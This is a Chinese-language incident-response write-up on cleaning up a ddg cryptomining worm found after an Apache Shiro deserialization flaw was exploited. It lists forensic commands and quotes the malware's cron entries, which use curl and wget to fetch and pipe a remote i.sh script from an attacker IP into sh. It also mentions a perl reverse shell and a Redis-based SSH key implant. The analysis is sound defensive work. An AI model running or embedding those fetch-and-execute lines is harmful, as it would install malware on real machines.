应急响应--记录一次漏洞紧急处理中意外发现的挖矿木马（Shiro反序列化漏洞和ddg挖矿木马）

背景

---

某公司线上服务器意外发现一个Apache Shiro 反序列化漏洞，可以直接GetShell。出于做安全的谨慎，马上出现场应急，确认漏洞。该漏洞存在在cookie字段中的rememberMe字段中，可以RCE

漏洞应急

---

来到现场后，发现已经升级了，漏洞确认修复完成，只能查看以前的攻击痕迹。

查看账号情况

首先查看账户文件/etc/passwd，修改时间和内容没有什么问题

stat /etc/passwd
cat /etc/passwd

查看文件情况

查看最近修改过的文件没看到特殊异常

ls -alst / -m -10 -name *

查看进程

查看进程

ps aux

看到异常 perl nc2.pl 后面参数跟着一个灯塔国地址，马上想到是反弹的shell，查问漏洞检测者，果真是，确认无害后kill进程。

查看网络连接

netstat -anop | grep tcp

发现服务器对外连接很多22端口，觉得异常，服务器主动对外发起连接22端口，很少见，询问业务也没有这类业务。看相关进程号，查看进程名ddg.2020。明显是一个矿马，经排查服务器上还启动redis和memcached。都是未授权访问。目测，是对外发起6379未授权漏洞的利用，写了root下的id_rsa.pub然后尝试22登录，看下自己的root下的.sshd，果真有id_rsa.pub不正常，因为都不适用root登录遂删除。查看进程目录。/tmp下面的，没有这个文件样板，全盘搜，只有ddg.2020.db没有ddg.2020，随机google，发现该样本会删除自己的文件，并启动定时任务去下载自己。

sudo -i
crontab -e

没有发现问题，还有一个地方

cat /var/spool/cron/crontabs/root

果然看到

curl -fsSL https://218.248.40.228:8443/i.sh | sh
wget -g -O -http://218.248.40.228:8443/i.sh | sh

马上配置阻断

查看进程运行时间对应的操作

history #只有四百多条，很明显不对
who /var/log/wtmp
last
last /var/run/utmp #

发现那天的登录日志被清理。

查看VPC内其他主机，都不存在该蠕虫，那么肯定就是通过getshell打进来，然后种了样本之后离开的。

总结

---

异常的发现在于明显区别于正常使用用途的网络连接。